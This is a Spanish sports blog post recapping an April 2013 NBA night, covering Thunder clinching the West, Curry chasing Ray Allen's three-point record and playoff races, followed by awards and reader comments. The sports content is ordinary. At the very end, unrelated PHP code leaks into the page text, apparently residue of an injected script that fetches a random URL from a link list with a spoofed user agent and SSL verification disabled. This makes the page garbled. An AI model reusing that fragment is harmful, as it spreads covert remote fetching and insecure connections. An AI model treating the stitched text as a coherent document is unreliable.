La Crónica: Los Thunder, líderes del Oeste

16 de April de 2013 por Simon

Antepenúltima jornada de liga regular en la NBA, que sirvió para ir cerrando puestos de manera definitiva y que estuvo marcada por las dos explosiones en la maratón de Boston. El partido que se debía jugar hoy entre Boston y Indiana ha sido cancelado por lo que ambos equipos terminarán la temporada con 81 partidos.

En el Oeste quedaban todavía muchas cosas por decidir y ayer ya se confirmó que Oklahoma City Thunder será el primer cabeza de serie.  Oklahoma venció sin ningún tipo de problema a Sacramento Kings (95-104) con Kevin Durant coqueteando con el triple doble y muchos minutos para los más inusuales. Por su parte, San Antonio perdió la posibilidad de luchar por el primer puesto de la conferencia que ha ocupado durante casi toda la temporada tras su segunda derrota consecutiva, esta vez ante los Golden State Warriors. Un desatado Stephen Curry anotó tres triples en el parcial de 19-0 que endosaron los Warriors a los Spurs para cerrar el partido, llevarse la victoria de manera brillante y asegurarse el sexto puesto de la conferencia (106-116). Con los 7 triples de ayer Curry suma ya 268 triples anotados durante esta temporada, a solo uno del récord de Allen por lo que es más que posible que lo supere en el último partido de la regular ante los Blazers.

En la zona media-alta del Oeste, Denver se aseguró  tener ventaja de campo en primera ronda gracias a una ajustada victoria en la cancha de Milwaukee Bucks. Milwaukee adaptó su ritmo al de Denver y el ritmo de anotación fue alto durante todo el partido.  Ty Lawson anotó la canasta definitiva a falta de 9 segundos y JJ Reddick no pudo dar la respuesta en el otro lado por lo que Denver se llevó una victoria vital (112-111). Por su parte, Memphis a pesar de la victoria en cancha de Dallas, ya saben que no podrán ser terceros del Oeste y tampoco dependen de sí mismos para ser cuartos. Los titulares de Memphis Grizzlies apenas contaron con minutos  ayer y los suplentes respondieron con un gran partido y la victoria (103-97) haciendo estériles los partidazos de Nowitzki y Carter.

Los dos últimos puestos de Play Off en el Oeste se decidirán en la última jornada a pesar de que ya nadie contaba con que la séptima plaza pudiera estar en juego. Los Rockets se metieron en problemas tras perder ayer en Phoenix con un monumental partido de la pareja Luis Scola y Goran Dragic que se despiden de su público esta temporada de la mejor manera (112-119). Utah hizo los deberes y no dio ni una opción a Minnesota. Desde el primer cuarto abrió hueco y los de Rubio ni les vieron hasta el final del partido (96-80). En la última jornada Utah deberá ganar y esperar la derrota de Lakers, que con los resultados de ayer, si gana será séptimo pues tendría igualado el parcial con Houston pero ganaría el desempate por el mayor número de victorias en la propia conferencia.

Y ahora nos vamos a la conferencia Este a la que no le hemos hecho mucho caso hoy debido a que está todo prácticamente decidido a excepción de la quinta y sexta plaza que disputan Chicago Bulls y Atlanta Hawks. El líder, Miami consiguió la victoria sin ningún titular habitual en cancha ante Cleveland Cavaliers que a pesar de marchar claramente por debajo al inicio del último cuarto a punto estuvieron de lograr la remontada (96-95).  Norris Cole se quedó a una sola asistencia de lograr un triple doble. New York Knicks con el segundo puesto de la conferencia en el bolsillo y los jugadores importantes descansando, cayó en Charlotte (95-106)  que con esta victoria consiguen salir del farolillo rojo de la liga que ahora ostenta Orlando Magic que perdió ante unos Bulls que apuran sus últimas opciones de ser quintos de la conferencia Este (102-84). Noah volvió tras haberse perdido los últimos cuatro encuentros aunque solo jugó 14 minutos. El mejor Bull fue Boozer que va a completar una de las mejores temporadas de su carrera.

En el resto de partidos sin nada en juego, Detroit ganó a Philadelphia y consiguen su cuarta victoria consecutiva gracias a un espectacular partido de Greg Monroe al que la presencia de Drummond le viene de perlas (101-109). Brooklyn venció a Washington Wizards a pesar de que reservaron a la mayoría de sus mejores jugadores (101-106). Blatche y Humphries  copiaron a sus titulares siendo los mejores como es habitual en la pareja López/Evans.

PREMIOS

MVP: Tras los 7 triples de ayer, Stephen Curry se queda a un paso de superar a Ray Allen pero como no sólo de triples vive el hombre, el jugador de los Warriors acabó con 35 puntos, 8 rebotes, 5 asistencias y 2 robos. No menos espectacular fue el partido de Greg Monroe, autor de 27 puntos, 16 rebotes y 4 asistencias. Kevin Durant mantuvo el ritmo con 29 puntos, 7 rebotes y 8 asistencias.

Rookie: Chris Copeland disfruta de minutos y responde con buenas actuaciones. Ayer anotó 32 puntos y capturó 7 rebotes.

Sorpresa: Las incontables bajas en los Knicks provocan que jugadores como Chris Copeland o James White se disparen. Del primero ya hemos hablado y el segundo anotó 15 puntos a los que añadió 7 rebotes y 6 asistencias. Norris Cole se quedó a solo una asistencias del triple-doble (16-11-9).

Decepción: Mal día escogió James Harden para fallar los 7 triples que intentó y quedarse en 16 puntos. Brandon Jennings lo hizo aún peor y sólo anotó 4 tras fallas 10 de sus 11 intentos de canasta. Lo de OJ Mayo ya empieza a no sorprender.

Esfuerzo en vano: Monta Ellis se perdió el entrenamiento de la mañana porque no se encontraba bien y por la noche les endosó 38 puntos a los Nuggets, 19 en el último cuarto, incluida una jugada de 4 puntos a falta de 12 segundos que puso a su equipo por delante. Si no llega a ser por Ty Lawson se lleva el partido.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. Simon dice:
    #1

      Citar

  2. Denise dice:
    #2

    Jose Luis: Por otro lado, Utah juega a las 2 y Lakers a las 4 30, ya sabrán lo que ha hecho Utah

    Pues como Utah gane…ya me estoy imaginando a Metta World Peace intimidando y dando leña a lo bestia a Harden.
    Que merito tiene lo de Curry, creo que pueden pasar años hasta que salga otro tirador que llegue a esos numeros

      Citar

  3. Jose Luis dice:
    #3

    Mejor que le de leña un Morris de la vida y si se pierde partidos pues que se los pierda xD

    Fuera de coñas. Los Lakers pueden vencer a Houston. Howard es superior a Asik, que es más defensor de zona que individual, y Gasol puede hacer un traje a quien sea. Artest con Harden, Clark con Parsons. Veremos.

      Citar

  4. GreenPride dice:
    #4

    Bueno pues partido a muerte final entre Lakers y Rockets. Los Lakers se encuentran que una victoria les da el séptimo puesto tras el tropezón de los Rockets en Phoenix y les mandaría a jugar contra San Antonio en PO en vez de contra OKC. ¡Qué lástima de la lesión de Kobe para los angelinos! Veremos cómo se comportan los Rockets y si realmente van a muerte para intentar evitar a Oklahoma o les da igual uno que otro.
    Por otra parte a día de hoy veo pocas opciones a los Jazz de ganar en Memphis con los Grizzlies jugándose la ventaja campo. Aunque es verdad que han dado descanso a sus titulares esta jornada como si ya contasen con que los Clippers va a ganar lo que les queda lo que les dejaría en 5ª plaza. Si vuelven a dar descanso a todos los titulares pueden dar la victoria a los Jazz y poner el partido de LA aún más al rojo… Veremos qué pasa

      Citar

  5. Jose Luis dice:
    #5

    Jordan Hill acaba de anunciar que podrá disputar los PO.

    Memphis no ha dado descanso a los titulares, simplemente los suplentes fueron los que levantaron el partido y el entrenador les mantuvo en pista.

      Citar

  6. Jose Luis dice:
    #6

    Mm los Clippers prácticamente tienen que conseguir dos victorias. Portland en LA será sencillo, pero ganar en Sacramento, bacl-to-back, último partido de la temporada, los Kings en casa, quizá último partido de los Kings como tales si se consuma el traslado a Seattle, Grizzlies puede ponerles presión si ganan a Utah… OJO.

      Citar

  7. Jose Luis dice:
    #7

    Hace menos de un mes los Kings vapulearon a los Clippers, 101-116

      Citar

  8. Esteban dice:
    #8

    que jordanada de definicionessss

    los lakers a pesar de todo aun pueden ser septimos, la decadencia de la conferencia oeste de hace unos años a esta parte a explota, pensar que antes practicamente se requerian 48 victorias para ingresar al octavo puesto, este año con 45 y/o 46, estan peleando el sexto

      Citar

  9. Denise dice:
    #9

    Esteban: que jordanada de definicionesssslos lakers a pesar de todo aun pueden ser septimos, la decadencia de la conferencia oeste de hace unos años a esta parte a explota, pensar que antes practicamente se requerian 48 victorias para ingresar al octavo puesto, este año con 45 y/o 46, estan peleando el sexto

    Decadencia??? Joder,, pero si por balance fuese solo 4 equipos del Este se clasificaráin para playoffs en el Oeste.
    Y en realidad, teniendo en cuenta la de veces que se tendrían que enfrentar entre ellos, solo Miami y N York tienen equipo para jugar playoffs en el Oeste. Los Pacers sin Granger y los irregulares Nets ni hubieran olido PO, y del resto ni hablamos..
    Para mi la diferencia entre conferencias está en uno de sus puntos máximos..

      Citar

  10. diestro dice:
    #10

    A dia de hoy hay una media de 4, 75 victorias de diferencia entre equipos de las dos conferencias. Eso sin contar que entre los de la misma conferencia se enfrentan mas veces. (Sumando todas las victorias por conferencia y dividiendo entre el numero de equipos de cada conferencia.)

    decadencia? !?!?

      Citar

  11. nba dice:
    #11

    Jose Luis:
    Mejor que le de leña un Morris de la vida y si se pierde partidos pues que se los pierda xD

    Fuera de coñas. Los Lakers pueden vencer a Houston. Howard es superior a Asik, que es más defensor de zona que individual, y Gasol puede hacer un traje a quien sea. Artest con Harden, Clark con Parsons. Veremos.

    Puff esperemos que el barbas no se quiera redimir de este partido, porque sino el froncourt de Lakers ya puede echarse a temblar, acaso nadie se acuerda ya, que cuando se produjo el trade a rockets muchas decian que Harden se estaba cavando su propia tumba, pues cuidao que la regular no ha terminado . y ojito con que Delfino no tenga el dia…

      Citar

  12. Esteban dice:
    #12

    diestro: tienen equipo para jugar playoffs en el Oeste. Los Pacers sin Granger y los irregulares Nets ni hubieran olido PO, y del resto ni hablamos..
    Para mi la diferencia entre conferencias está en uno de sus puntos máximos..

    si decadencia, ver equipos como utha y los rockets en PO en el oeste marcan una decadencia, años atras ni lo hubieran soñado

    es cierto que es este esta muy mal, pero los bulls jugaron todo el año sin rose y los pacers sin granger, mientras que atlanta esta en una reconstruccion que deberia terminar el año proximo, del resto bueno, salvo los celtics no vale la pena hablar, pero es una conferencia a mi parecer en progreso

    mientras que los gigantes del oeste, deben ajustar muchas tuercas para mantenerse en la elite desp de tantos años, los suns y los mavs no pudieron hacerlo, los lakers ni gastando mas que toda la liga, y los spurs por el milagro duncan,
    de otra forma serian 4 equipos que han hecho gloria en los ultimos años, incluso 3 de lsoq eu han ganado liga, pasando un mal momento

      Citar

  13. MagicJohnson32 dice:
    #13

    McGraaaaaaaaaaaaaadyyyyyyyyyyyyyyyyy!!

    Sorpresón. Tengo ganas de verlo, a ver cómo anda. Sólo tiene 33 años, yo creo que lo puede hacer bien. Qué grande es Buford, jeje.

      Citar

  14. rumbero dice:
    #14

    Wow Mcgrady!! Hay que verlo aunque sea solo un ratito
    Y otro de 33 que vuelve a los Knicks. Quentin Richardson, que igual mete dos triples seguidos como se las tiene con Garnett.

      Citar

  15. R1Molano dice:
    #15

    Esteban:
    que jordanada de definicionessss

    los lakers a pesar de todo aun pueden ser septimos, la decadencia de la conferencia oeste de hace unos años a esta parte a explota, pensar que antes practicamente se requerian 48 victorias para ingresar al octavo puesto, este año con 45 y/o 46, estan peleando el sexto

    Ya no pueden ser sextos. Solo lo pueden ser GSW o Houston

      Citar

  16. Denise dice:
    #16

    MagicJohnson32: McGraaaaaaaaaaaaaadyyyyyyyyyyyyyyyyy!!Sorpresón. Tengo ganas de verlo, a ver cómo anda. Sólo tiene 33 años, yo creo que lo puede hacer bien. Qué grande es Buford, jeje.

    Ahora solo falta que Lakers fiche a Gilbert Arenas y los Celtics a Allen Iverson..xD.

    En serio, buen movimiento de los Spurs.

      Citar

  17. Denise dice:
    #17

    Y por cierto, McGrady nunca ha pasado una ronda de playoffs no?

    Como los Spurs caigan, va a resultar verdad que es gafe.

      Citar

  18. Jose Luis dice:
    #18

    Correcto Denise… a ver si los Lakers acaban 7ºs y con el gafe de T-Mac… todo puede pasar jajajaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>